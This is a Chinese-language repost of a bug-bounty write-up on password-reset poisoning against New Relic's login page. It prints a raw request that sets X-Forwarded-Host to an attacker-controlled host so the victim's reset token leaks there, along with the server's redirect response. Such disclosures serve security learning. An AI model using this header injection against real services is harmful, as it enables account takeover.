利用主机头注入来进行账户劫持
2023-10-5 15:35:1 Author: mp.weixin.qq.com(查看原文) 阅读量:4 收藏

业务背景

这是一个密码重置功能。

复现步骤

  • 打开密码重置链接: https://login.newrelic.com/passwords/forgot

  • 输入受害者的电子邮件地址,然后单击重置和电子邮件密码

  • 在Burp Suite中拦截HTTP请求,并添加X-Forwarded主机标头并写入类似如下内容:

attacker.com/.newrelic.com

链接类似如下:

https://testing-now.000webhostapp.com/.newrelic.com/passwords/reset/a248d8b06e7b25a116859729cbc0e07e180d9fb197dadc04f30185512eecc811

受害者将在他们的电子邮件中收到恶意链接,当点击时,将泄露用户的密码重置链接/令牌给攻击者,导致帐户被完全接管。

请求是类似下面这样的:

POST /passwords/forgot HTTP/1.1
Host: login.newrelic.com
X-Forwarded-Host: testing-now.000webhostapp.com/.newrelic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 626
Connection: close
Referer: https://login.newrelic.com/passwords/forgot
Cookie: _ga=GA1.2.1721374031.1568844736; ajs_user_id=null; ajs_group_id=null; _gcl_au=1.1.1636905160.1568844739; ei_client_id=5d82b02df99b140010808282; _mkto_trk=id:412-MZS-894&token:_mch-newrelic.com-1568844750536-52713; _fbp=fb.1.1568844751467.1905354417; qca=P0-625668904-1568844751500; optimizelyEndUserId=oeu1568844783430r0.2931045891390677; ajs_anonymous_id=%22b1e86a3a-04a1-48f5-a1c9-37167a1991c8%22; s_fid=78F091CDC3B81C9E-153BD36510D98B56; intercom-id-cyym0u3i=9a67a50f-33f2-4fdb-b74f-7e8d058de750; adroll_fpc=8e6e5aa9e24ca0efac425a4b2c6d4c4e-s2-1568844790580; __ar_v4=YCNZVXZ6TJDJ3KMJRVGKFH%3A20190918%3A3%7CI7ZJI4CQMBCNHGOQ27AYQZ%3A20190918%3A3%7CDLQZ5QQWIFBZZM5ECJME6X%3A20190918%3A3; _golden_gate_session=DlKqVDqbL%2B6%2Fi298zevCA1yH1PgkIDlWIgCVNuUC2CbfqR55ZnQKWXdh8nIl2F3kP4u%2BC9gLAfxsg6jOWfPwuQVDa0GcDhR6VoddruVbqMGjdogry5tZvDs7K8BZkCVH49Z8KHpTXRAv7DJIjEePjX4LcqtNJzRs65Fm6Y97sFIzI4Hvm081ptYeD0Nk543GaLZMtTnT98Rgdu2nftfEV7PrfmqnXKUR%2FDHhVX%2BPjI0qjGZ3PyL3UX9EigZ%2BMcEFiFGPzQXKSW%2BAiVG4Y71rQBOfwm%2FlSz%2B8RGJ0WfEoL%2BBRDquU1w%2BOPxA2r3u8sU02xG4dg07nZeo%3D--SewvpLvUIyY0YJTh--bWuTrIMZhXu6MP8PDg2iZA%3D%3D
Upgrade-Insecure-Requests: 1

响应如下:

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 134
Content-Type: text/html; charset=utf-8
Date: Fri, 20 Sep 2019 00:49:19 GMT
Location: https://testing-now.000webhostapp.com/.newrelic.com/passwords/forgot
Server: nginx
Set-Cookie: _golden_gate_session=Awolm37t0RVohChn8c%2FTtEpVzRz%2BYUXP%2FC6eqVDXqoY7IHMmItXq6vRR%2FLr45q31mXIOFUemqprmptlEuI2mIRy5ZN84OGsjWJWIUnZ34e0ve4IJf0Iqjh%2BbnsP0elEXQ%2B7gm12%2FRlfO4KSXZl7kkKcMrECZo8jQ%2B2SzO9cfYA6DcqNP%2BxlJkqQmQuF8eRXBqGwisVdIBtYqzHLzJDl6n7cZoXW9EyX%2FPMOAuJ3YlxUFoomKE6Z2%2BfgmCKPxeEQRtne%2BvtTJH5xzvNUnyN3JTSNVo4y47xZvjcnYLPzdW1vhptWGxtiyF99zy%2BCqrj11VlLz5PA4Idf0H8OmTqLvzVT42C40SN8qRtz1jP%2BhDjuwDsAr9aDabjj4O41F7AoivfsBXf0vJanmXOmllZXqRiLmiV81nTAEOi5S8EBDbkT3TLrkIu1Uuo2TdkXCDQXyasWXzg%2F1zRI08xOgr6IgdOJhxbZy6Se2ToIMbsYRA532mzLKFXPq2xCIU%2FTuEWdFyXbk4w%2Bo5qH6z21Qqibl32S7VgkN%2Fc61SYJcyipdyJsWWKT6lhHnv%2BHeCGi4OoE3wonpFRm9Z7pNDh%2BamsTtBUOCQgJeNYYnyz35Ggeueeo%2BVYqC46qNpedWs%2B9vXIH%2FRVQguzv9rfU%3D--MxbKlXOo06QW75kP--4a4Glp1aMgEoV2XXukgnIA%3D%3D; path=/; HttpOnly; secure; SameSite=Lax
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: DENY
X-Permitted-Cross-Domain-Policies: none
X-Request-Id: ec1ad038-4b96-4915-b107-3422151a3ab1
X-Runtime: 0.113080
X-Xss-Protection: 1; mode=block
Connection: close
<html><body>You are being <a href="https://testing-now.000webhostapp.com/.newrelic.com/passwords/forgot">redirected</a>.</body></html>
look at attachments

如果你是一个长期主义者,欢迎加入我的知识星球(优先查看这个链接,里面可能还有优惠券),我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

往期回顾

2022年度精选文章

SSRF研究笔记

xss研究笔记

dom-xss精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips

福利视频

笔者自己录制的一套php视频教程(适合0基础的),感兴趣的童鞋可以看看,基础视频总共约200多集,目前已经录制完毕,后续还有更多视频出品

https://space.bilibili.com/177546377/channel/seriesdetail?sid=2949374

技术交流

技术交流请加笔者微信:richardo1o1 (暗号:growing)


文章来源: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247492124&idx=1&sn=64ea88a140460ca83d3ebb9d064ec482&chksm=e8a5e87fdfd26169e90e45009b83bf413a8fe875861448dd50d7393e446d2e942baf45849581&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh